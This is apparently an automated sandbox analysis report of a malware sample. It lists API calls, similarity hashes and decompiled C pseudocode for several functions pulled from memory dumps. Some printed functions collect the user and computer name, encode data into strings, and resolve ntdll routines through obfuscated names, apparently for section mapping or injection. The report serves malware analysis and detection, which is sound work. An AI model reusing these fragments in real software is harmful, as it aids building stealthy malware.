0x02c947de
0x02c947ef
0x02c947f8
0x02c947fc
0x02c94800
0x02c94805
0x02c9480a
0x02c9480c
0x02c9480c
0x02c94816
0x02c9481f
0x02c94826
0x02c9483e
0x02c94842
0x02c9487f
0x02c94844
0x02c94847
0x02c9484f
0x02c94860
0x02c9486c
0x02c94874
0x02c94878
0x02c94878
0x02c94842
0x02c94887
0x02c9488c
0x02c94893

APIs

GetTickCount.KERNEL32 ref: 02C94759
lstrlen.KERNEL32(?,80000002,00000005), ref: 02C94799
lstrlen.KERNEL32(00000000), ref: 02C947A2
lstrlen.KERNEL32(00000000), ref: 02C947A9
lstrlenW.KERNEL32(80000002), ref: 02C947B6
lstrlen.KERNEL32(?,00000004), ref: 02C94816
lstrlen.KERNEL32(?), ref: 02C9481F
lstrlen.KERNEL32(?), ref: 02C94826
lstrlenW.KERNEL32(?), ref: 02C9482D

Part of subcall function 02C9A5FA: HeapFree.KERNEL32(00000000,00000000,02C981B4,00000000,?,?,00000000), ref: 02C9A606

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 42d4a3f75a535e0822497c0e5dcfd4d1320637087ae3785d0836fb0467657052
Instruction ID: 92c0c91db29191adb51ea177fda4140fe4f6c2cd4ce3126f69ba76ae4358980f
Opcode Fuzzy Hash: 42d4a3f75a535e0822497c0e5dcfd4d1320637087ae3785d0836fb0467657052
Instruction Fuzzy Hash: 55414C72D00159EBCF11AFA4CC48A9EBBB5EF48314F054191E905A7250D735DB25EF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ADF10, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1ADF1D

Part of subcall function 6E1A9060: pDNameNode::pDNameNode.LIBCMTD ref: 6E1A909A

operator+.LIBVCRUNTIMED ref: 6E1ADF52
DName::isEmpty.LIBCMTD ref: 6E1ADF74

Part of subcall function 6E1B04F0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B04F9

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1ADFEA
Mailbox.LIBCMTD ref: 6E1AE006

Strings

X, xrefs: 6E1ADF3D

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Iterator_baseIterator_base::_std::_$EmptyMailboxName::Name::isNodeNode::poperator+
String ID: X
API String ID: 3628514644-3081909835
Opcode ID: 8d86bcd2a78517aff7a67822296331a875eb4f911b7e021b5daf31779a95ae8f
Instruction ID: a67247bd4499561b1bc577fab27010990386c3137d3c4c39b7a4b965d459b498
Opcode Fuzzy Hash: 8d86bcd2a78517aff7a67822296331a875eb4f911b7e021b5daf31779a95ae8f
Instruction Fuzzy Hash: A1318379D00108ABCF04CFE8D950AFE77B8AB45308F048158EB156B241E771ABC4DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F02E0, Relevance: 12.1, APIs: 8, Instructions: 141timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E1F0399
__MarkAllocaS.LIBCMTD ref: 6E1F03A2

Part of subcall function 6E1E81B0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E1E81E3

std::_Timevec::_Timevec.LIBCPMTD ref: 6E1F03BD
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1F03C8
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F03E3
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F0447
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 6E1F046E
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F047A

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
String ID:
API String ID: 2378836076-0
Opcode ID: 76f3cf53ef6038ca0a797ca6b48da0f4a1be9e686b0d6ae99de1644c4b9865cc
Instruction ID: 427f87014dd4e18399ba6ac9a955489daab840cf0c7ded6bfba174d23bd3cb83
Opcode Fuzzy Hash: 76f3cf53ef6038ca0a797ca6b48da0f4a1be9e686b0d6ae99de1644c4b9865cc
Instruction Fuzzy Hash: D6510AB1910208EFDB04DFD8CC91BEEB7B9AF54308F504558E51167290EB74AA86EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0DD0, Relevance: 12.1, APIs: 8, Instructions: 127COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0E5B
UnDecorator::doMSKeywords.LIBCMTD ref: 6E1B0E60
DName::operator+=.LIBCMTD ref: 6E1B0E72

Part of subcall function 6E1A9AD0: DName::isValid.LIBCMTD ref: 6E1A9ADC
Part of subcall function 6E1A9AD0: DName::isEmpty.LIBCMTD ref: 6E1A9AF0

Part of subcall function 6E1A9E20: UnDecorator::doUnderScore.LIBCMTD ref: 6E1A9E26

Part of subcall function 6E1A9990: DName::isValid.LIBCMTD ref: 6E1A999C
Part of subcall function 6E1A9990: DName::isEmpty.LIBCMTD ref: 6E1A99B1

DName::DName.LIBVCRUNTIMED ref: 6E1B0F0A

Part of subcall function 6E1A9990: DName::append.LIBCMTD ref: 6E1A9A14

DName::operator+=.LIBCMTD ref: 6E1B0F4C
Mailbox.LIBCMTD ref: 6E1B0F58
DName::DName.LIBVCRUNTIMED ref: 6E1B0F69
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0F78

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::is$Decorator::doEmptyIterator_baseIterator_base::_NameName::Name::operator+=Validstd::_$KeywordsMailboxName::appendScoreUnder
String ID:
API String ID: 4042095736-0
Opcode ID: ce6a192099fadf8656e0a3ee769f2c28f7cd29aaa90990049c4c45ebe402725e
Instruction ID: e6954e5cb7f44e6410f30ab1f9d8887ba5d312e73920aeef14ff629f2a4821ec
Opcode Fuzzy Hash: ce6a192099fadf8656e0a3ee769f2c28f7cd29aaa90990049c4c45ebe402725e
Instruction Fuzzy Hash: 9F518174E40209EFCF04CFE8DAA1AEEBBB5BF45304F148169E6156B290EB715AC4DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B35D0, Relevance: 12.1, APIs: 8, Instructions: 121COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1B35E7

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::isValid.LIBCMTD ref: 6E1B3603
DName::DName.LIBVCRUNTIMED ref: 6E1B3611

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Name::isNode::makeStatusValid
String ID:
API String ID: 4056879799-0
Opcode ID: d56012912fc05d88ea7cd0ac46057051cc0411388d629288f30529fd0fdd5840
Instruction ID: 2f368bfa954e831508eeb63ff74e5e531eb9305a53c88240f25de0be640fefce
Opcode Fuzzy Hash: d56012912fc05d88ea7cd0ac46057051cc0411388d629288f30529fd0fdd5840
Instruction Fuzzy Hash: 3E41D9B49402189BCF04DFE8DDA4AFF77B9BF11308F004559E51257280EBB1AAD5EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9A30, Relevance: 12.1, APIs: 8, Instructions: 51COMMON

Download Yara Rule

APIs

DName::isValid.LIBCMTD ref: 6E1A9A3C
DName::isEmpty.LIBCMTD ref: 6E1A9A48
DName::isEmpty.LIBCMTD ref: 6E1A9A54
DName::operator=.LIBVCRUNTIMED ref: 6E1A9A69

Part of subcall function 6E1A9680: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A96B7

Mailbox.LIBCMTD ref: 6E1A9A77
DName::isEmpty.LIBCMTD ref: 6E1A9A81
DName::operator+=.LIBCMTD ref: 6E1A9AA4

Part of subcall function 6E1A9C00: DName::isValid.LIBCMTD ref: 6E1A9C0A
Part of subcall function 6E1A9C00: DName::isEmpty.LIBCMTD ref: 6E1A9C16
Part of subcall function 6E1A9C00: DName::operator=.LIBVCRUNTIMED ref: 6E1A9C32

DName::append.LIBCMTD ref: 6E1A9AB4

Part of subcall function 6E1A8AF0: pairNode::pairNode.LIBCMTD ref: 6E1A8B26

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::is$Empty$Name::operator=Valid$MailboxNameName::appendName::operator+=NodeNode::makeNode::pairStatuspair
String ID:
API String ID: 1694665504-0
Opcode ID: a50bae2e5a04cd5d19dcb78220e3e880fd3995275077969029709e1c6631a1f8
Instruction ID: 1ff1eabfa86c009cec20287610246e3d3cc1f55b21993576d838c48cce50274b
Opcode Fuzzy Hash: a50bae2e5a04cd5d19dcb78220e3e880fd3995275077969029709e1c6631a1f8
Instruction Fuzzy Hash: B7115238A10109EFCB04DFDDE9A59FD7779AF84244F10846ADA069B250DB319EC1FB51

Uniqueness

Uniqueness Score: -1.00%

Function 02C91363, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C91363() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02C97E20(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02C9A5FA(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2c92a02
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02c91371
0x02c91374
0x02c91377
0x02c9137d
0x02c91382
0x02c91388
0x02c91390
0x02c91393
0x02c91399
0x02c9139e
0x02c913ab
0x02c913b8
0x02c913bc
0x02c913be
0x02c913c2
0x02c913c5
0x02c913d5
0x02c91428
0x02c91429
0x02c913d7
0x02c913dc
0x02c913dd
0x02c913e2
0x02c913e5
0x02c913f8
0x00000000
0x02c913fa
0x02c913fd
0x02c91402
0x02c91410
0x02c91413
0x02c91419
0x02c9141e
0x00000000
0x02c91420
0x02c91420
0x02c91423
0x02c91423
0x02c9141e
0x02c913f8
0x02c9142e
0x02c9142f
0x02c9139e
0x02c91435

APIs

GetUserNameW.ADVAPI32(00000000,02C92A00), ref: 02C91377
GetComputerNameW.KERNEL32(00000000,02C92A00), ref: 02C91393

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

GetUserNameW.ADVAPI32(00000000,02C92A00), ref: 02C913CD
GetComputerNameW.KERNEL32(02C92A00,?), ref: 02C913F0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02C92A00,00000000,02C92A02,00000000,00000000,?,?,02C92A00), ref: 02C91413

Strings

@hxt, xrefs: 02C91413

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID: @hxt
API String ID: 3850880919-1276795746
Opcode ID: 23a3b2727c3e995613c8aa36a5c9a6f39ce805085312bb41e776451d539f60d3
Instruction ID: fe4dea2ddad83f26e9258ac3ed683ff5d76edd7528f604d5a5e6fea0b159ec99
Opcode Fuzzy Hash: 23a3b2727c3e995613c8aa36a5c9a6f39ce805085312bb41e776451d539f60d3
Instruction Fuzzy Hash: 3A212976900249FFCB10DFE8D9899EEBBB9EF49304B5448AAE506E7200D7309B55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02C98840, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E02C98840(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2c9d2a4; // 0x24aa5a8
				_t1 = _t9 + 0x2c9e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02C92BC9(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02C97E20(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02C95FCE(_t34, _t41, _a8);
						E02C9A5FA(_t41);
						_t42 = E02C97D98(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02C9A5FA(_t36);
							_t36 = _t42;
						}
						_t43 = E02C97EBE(_t36, _t33);
						if(_t43 != 0) {
							E02C9A5FA(_t36);
							_t36 = _t43;
						}
					}
					E02C9A5FA(_t28);
				}
				return _t36;
			}

0x02c98840
0x02c98843
0x02c98844
0x02c9884c
0x02c98853
0x02c9885a
0x02c9885e
0x02c98864
0x02c9886b
0x02c98870
0x02c98882
0x02c98886
0x02c9888a
0x02c98890
0x02c98895
0x02c988a5
0x02c988a7
0x02c988be
0x02c988c2
0x02c988c5
0x02c988ca
0x02c988ca
0x02c988d3
0x02c988d7
0x02c988da
0x02c988df
0x02c988df
0x02c988d7
0x02c988e2
0x02c988e2
0x02c988ed

APIs

Part of subcall function 02C92BC9: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,02C9885A,253D7325,00000000,00000000,770CC740,?,?,02C92AF0,?), ref: 02C92C30
Part of subcall function 02C92BC9: sprintf.NTDLL ref: 02C92C51

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02C92AF0,?,051495B0), ref: 02C9886B
lstrlen.KERNEL32(?,?,?,02C92AF0,?,051495B0), ref: 02C98873

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

strcpy.NTDLL ref: 02C9888A
lstrcat.KERNEL32(00000000,?), ref: 02C98895

Part of subcall function 02C95FCE: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02C988A4,00000000,?,?,?,02C92AF0,?,051495B0), ref: 02C95FE5

Part of subcall function 02C9A5FA: HeapFree.KERNEL32(00000000,00000000,02C981B4,00000000,?,?,00000000), ref: 02C9A606

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02C92AF0,?,051495B0), ref: 02C988B2

Part of subcall function 02C97D98: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02C988BE,00000000,?,?,02C92AF0,?,051495B0), ref: 02C97DA2
Part of subcall function 02C97D98: _snprintf.NTDLL ref: 02C97E00

Strings

=, xrefs: 02C988AC

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 4cefcc0c4f6c97535b5dfdba615452827008f7208470ccdf39ea13def28d3267
Instruction ID: 6c9bb5222bad0c736dcad71180934d80752e8916269a2528d1f758e72e9e5b7d
Opcode Fuzzy Hash: 4cefcc0c4f6c97535b5dfdba615452827008f7208470ccdf39ea13def28d3267
Instruction Fuzzy Hash: 9E11A377A015257B4F1277B89C8CD6F3BAE9F897643050125F606AB200CE34CE02ABF5

Uniqueness

Uniqueness Score: -1.00%

Function 02C914CE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C914CE(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2c9d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2c9d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2c9d258 = _t6;
					 *0x2c9d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2c9d254 = _t7;
					if(_t7 == 0) {
						 *0x2c9d254 =  *0x2c9d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02c914d6
0x02c914dc
0x02c914e3
0x00000000
0x02c9153d
0x02c914e5
0x02c914ed
0x02c914fa
0x02c914fa
0x02c9153a
0x00000000
0x02c9153a
0x02c914fc
0x02c914fc
0x02c91501
0x02c91513
0x02c91518
0x02c9151e
0x02c91524
0x02c9152b
0x02c9152d
0x02c9152d
0x00000000
0x02c91534
0x02c914f6
0x00000000
0x00000000
0x02c914f8
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02C95274,?,?,00000001,?,?,?,02C9647E,?), ref: 02C914D6
GetVersion.KERNEL32(?,00000001,?,?,?,02C9647E,?), ref: 02C914E5
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02C9647E,?), ref: 02C91501
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02C9647E,?), ref: 02C9151E
GetLastError.KERNEL32(?,00000001,?,?,?,02C9647E,?), ref: 02C9153D

Strings

@MxtNxt, xrefs: 02C9153D

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MxtNxt
API String ID: 2270775618-1701360479
Opcode ID: 0d585c028a869f53fd539bda970580d9bc64d8ac4f6821d88691bf0ad55c6d67
Instruction ID: 9c8b2a1fe6bc5a2b106600389a2dea4ad7fd63786208c2149107a510ced3b87f
Opcode Fuzzy Hash: 0d585c028a869f53fd539bda970580d9bc64d8ac4f6821d88691bf0ad55c6d67
Instruction Fuzzy Hash: 40F0AF70EC47439BDF20AB25A81EB143B61A789741F540B1AE54BD72D0E7B0C662CB14

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A67D0, Relevance: 9.1, APIs: 6, Instructions: 148COMMON

Download Yara Rule

APIs

___unDName.LIBVCRUNTIMED ref: 6E1A6821

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name___un
String ID:
API String ID: 3905892445-0
Opcode ID: 8dd0cfb56e2875d7107fc06aacaa9b6bf20beffa66068fa5b81fae7720d45a9c
Instruction ID: 95de900150fd45ae3a69962a4569f1b50eabf8ada901b419abdb6a83ba842a69
Opcode Fuzzy Hash: 8dd0cfb56e2875d7107fc06aacaa9b6bf20beffa66068fa5b81fae7720d45a9c
Instruction Fuzzy Hash: 215110B9D1410D9FDB18DFDDD890AFEB778AF14304F504468E626AB290EB306E85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2650, Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

DName::getString.LIBCMTD ref: 6E1B26EB

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::getString
String ID:
API String ID: 1028460119-0
Opcode ID: 162fe2d12ea88aba0aa3fdc26ec43d09587ff1e22f2f64364942d3e68c68ca98
Instruction ID: da48435fd058dd4752cbbe3da92b36ec5a5aa82985cab42a372e486d73aa5ff9
Opcode Fuzzy Hash: 162fe2d12ea88aba0aa3fdc26ec43d09587ff1e22f2f64364942d3e68c68ca98
Instruction Fuzzy Hash: D04164B5D0010CEFCF05DFE8E9949EE7BF9AF59304F148429E609AB240E7716A84DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C91598, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02C915F2
SysAllocString.OLEAUT32(0070006F), ref: 02C91606
SysAllocString.OLEAUT32(00000000), ref: 02C91618
SysFreeString.OLEAUT32(00000000), ref: 02C91680
SysFreeString.OLEAUT32(00000000), ref: 02C9168F
SysFreeString.OLEAUT32(00000000), ref: 02C9169A

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 37a855cf3da2ab06ffd66636fe4b81f88838da10ee8c6aae73ce29cec3b82be9
Instruction ID: b272a909f8559c7248c2f6ee400e4811e207b95d83b0ebae4732d41632a9f616
Opcode Fuzzy Hash: 37a855cf3da2ab06ffd66636fe4b81f88838da10ee8c6aae73ce29cec3b82be9
Instruction Fuzzy Hash: 68415035D0060AABDF01DFF8D849A9EB7BAEF89304F184466E914EB110DB719A05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AEA30, Relevance: 9.1, APIs: 6, Instructions: 115COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AEA39
DName::DName.LIBVCRUNTIMED ref: 6E1AEB0A
operator+.LIBVCRUNTIMED ref: 6E1AEB77
Mailbox.LIBCMTD ref: 6E1AEB83
Mailbox.LIBCMTD ref: 6E1AEB8F
DName::DName.LIBVCRUNTIMED ref: 6E1AEBA0

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: MailboxNameName::$Iterator_baseIterator_base::_operator+std::_
String ID:
API String ID: 3503010255-0
Opcode ID: 755752d690362390eaab9a619bf7056607955ff360797a4955fb148f0290e9af
Instruction ID: a052a8fe9af06d9f87392a10e6c38d48f6c134f16340c6424ae0daefeb35e517
Opcode Fuzzy Hash: 755752d690362390eaab9a619bf7056607955ff360797a4955fb148f0290e9af
Instruction Fuzzy Hash: 7D412D79D00208EFCB05DFE8E9A59FDBBB5BB45305F10816AE6066B240EB315BC4DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C94896, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C94896(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02C97E20(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2c9d2a4; // 0x24aa5a8
					_t1 = _t23 + 0x2c9e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2c9d2a4; // 0x24aa5a8
					_t2 = _t26 + 0x2c9e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02C9A5FA(_t54);
					} else {
						_t30 =  *0x2c9d2a4; // 0x24aa5a8
						_t5 = _t30 + 0x2c9e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2c9d2a4; // 0x24aa5a8
							_t7 = _t33 + 0x2c9e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2c9d2a4; // 0x24aa5a8
								_t9 = _t36 + 0x2c9e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2c9d2a4; // 0x24aa5a8
									_t11 = _t39 + 0x2c9e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02C96582(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02c948a5
0x02c948a9
0x02c9496b
0x02c948af
0x02c948af
0x02c948b4
0x02c948c7
0x02c948c9
0x02c948ce
0x02c948d6
0x02c948dd
0x02c948df
0x02c948e4
0x02c94963
0x02c94964
0x02c948e6
0x02c948e6
0x02c948eb
0x02c948f3
0x02c948f5
0x02c948fa
0x00000000
0x02c948fc
0x02c948fc
0x02c94901
0x02c94909
0x02c9490b
0x02c94910
0x00000000
0x02c94912
0x02c94912
0x02c94917
0x02c9491f
0x02c94921
0x02c94926
0x00000000
0x02c94928
0x02c94928
0x02c9492d
0x02c94935
0x02c94937
0x02c9493c
0x00000000
0x02c9493e
0x02c94944
0x02c94949
0x02c94950
0x02c94955
0x02c9495a
0x00000000
0x02c9495c
0x02c9495f
0x02c9495f
0x02c9495a
0x02c9493c
0x02c94926
0x02c94910
0x02c948fa
0x02c948e4
0x02c94979

APIs

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02C94F08,?,00000001,?,?,00000000,00000000), ref: 02C948BB
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02C948DD
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02C948F3
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02C94909
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02C9491F
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02C94935

Part of subcall function 02C96582: memset.NTDLL ref: 02C96601

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
